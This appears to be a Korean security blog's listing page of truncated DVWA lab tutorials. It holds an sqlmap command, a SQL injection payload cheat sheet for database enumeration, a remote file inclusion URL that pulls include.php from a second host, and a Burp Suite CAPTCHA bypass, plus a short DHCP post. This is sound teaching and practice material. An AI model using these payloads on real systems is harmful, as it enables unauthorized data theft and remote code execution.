InfoSec

DVWA - SQLMAP으로 SQL Injection 공격하기

SQLMAP 사용하기SQLMAP은 자동으로 특정 웹 사이트의 SQL취약점을 분석하고공격할 수 있는 명령을 제공하는 도구입니다.  sqlmap -u "http://서버IP/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=세션ID; security=low" 명령어를 정확하게 입력하면 SQL을 분석하기 위한 과정중의 옵션을 여러번 물어봅니다.우선은 모든 옵션을 기본값(엔터)로 주며 진행합니다.  분석이 완료되면 ending 메시지와 함께 종료되며,/root/.local/share/sqlmap/output/서버IP폴더 밑에 분석 정보가 저장되었음을 알려줍니다. 이제 분석이 완료되었으므로 명령어를 통해 SQL 데이터 정보를 가져올 ..

2024. 9. 19. 09:05

InfoSec

SQL Injection 공격에 사용하는 구문 모음

◈ WHERE 구문 우회   1' or '1' = '1   1' or 1 = '1 ◈ UNION 구문을 이용한 컬럼 갯수 확인   1' UNION select 1,1# ◈ ORDER BY 구문을 이용한 컬럼 갯수 확인   1' ORDER BY 2# ◈ 데이터베이스 이름 조회   1' union select schema_name, 1 from information_schema.schemata #  ◈ 데이터베이스 내의 테이블 이름 조회     1' union select table_schema, table_name from information_schema.tables WHERE table_schema = 'dvwa' #  ◈ 데이터베이스 내의 테이블 내의 컬럼 조회     1' union select t..

2024. 9. 13. 16:38

InfoSec

DVWA - SQL Injection

개요데이터베이스에 전송되는 SQL 쿼리문을 조작하여DB내의 데이터를 변조하거나 허가되지 않은 데이터에 접근할 수 있는 공격 ▶ 해킹사례  ☞ 2011년 소니: 약 100만명, 350만개의 쿠폰 탈취   ☞ 2015년 뽐뿌: 약 190만명의 개인정보 탈취  ☞ 2015년 WTO: 어나니머스의 공격으로 수천만명의 직원 정보 탈취 ▶ 공격 종류   ☞ WHERE 구문을 이용한 공격   ☞ UNION 구문을 이용한 공격 SQL Injection (Low Level) USER ID 검색 폼에 admin이라고 입력한 경우 1) 사용자가 정보를 요청한다2) 요청된 정보를 데이터베이스로 SQL쿼리문을 전송한다.   => SELECT name FROM 테이블명 WHERE ID='admin';3) 정보 요청 결과   주소..

2024. 9. 13. 15:47

InfoSec

DVWA - File Inclusion + File Upload (High Level)

File Inclusion (High Level)소스 분석 High Level의 소스코드는 파일 이름이 file*(file로 시작하는 이름)이거나include.php이어야 파일을 열 수 있으며파일의 이름이 다른 경우에는 에러 메시지가 출력됩니다.   공략 과정1. RFI Attack http://192.168.5.126/dvwa/vulnerabilities/fi/?page=http://192.168.5.216/include.php=> 다음과 같이 RFI 공격을 실행하면 에러가 메시지가 출력됩니다.     파일 이름이 file로 시작하거나 include.php로 정확히 일치하지 않으면     RFI 공격이 불가능합니다.  2. LFI Attack http://192.168.5.126/dvwa/vulnera..

2024. 9. 13. 11:35

InfoSec

DVWA - Insecure CAPTCHA

Low Level 취약점 찾기 1) Burp Suite > Proxy > Intercept > Intercept is ON 2) 새로운 비밀번호 및 확인 입력 3) 캡챠 버튼 클릭    -> 인증이 진행되지 않고 버프 스위트에 패킷이 잡힘  5) Foward를 클릭 하면 캡챠 인증이 진행 6) 그림 선택 후 Verify -> Foward를 선택하면 인증이 진행됨   -> 인증 신뢰도에 따라 그림 인증이 필요할 수도 필요없을 수도 있음 7) Change를 선택하면 Burp Suite에 패킷이 잡히고    Foward를 클릭하면 CAPTCHA 인증이 성공했다는 메시지가 출력됨 8) Change를 클릭하면 최종적으로 암호 변경이 적용됨★ 그런데 여기서 Burp Suite를 보면 두번째로 암호 변경 요청을 전송..

2024. 9. 12. 11:49

Server

DHCP 서버

Dynamic Host Configuration Protocol 클라이언트 서버 ---------- Discover --------->---------- Request --------->Acknowlegment -----  DHCP 서버 설치 (윈도우)1. 새 범위를 만든다.2. 대범위 및 멀티캐스트 범위를 추가하고 구성한다.3. 추가 제외 범위 설정과 같은 범위에 대한 속성을 보고 수정한다.4. 범위, 멀티캐스트 범위 또는 대범위를 활성화한다.5. 각 범위에 대한 활성 임대를 검토하여 범위 임대 작업을 모니터링한다.6. 임대용으로 영구 IP 주소가 필요한 DHCP 클라이언트에 대해    필요한 만큼 범위에서 예약을 만든다.   dnf install -y

2024. 7. 23. 11:32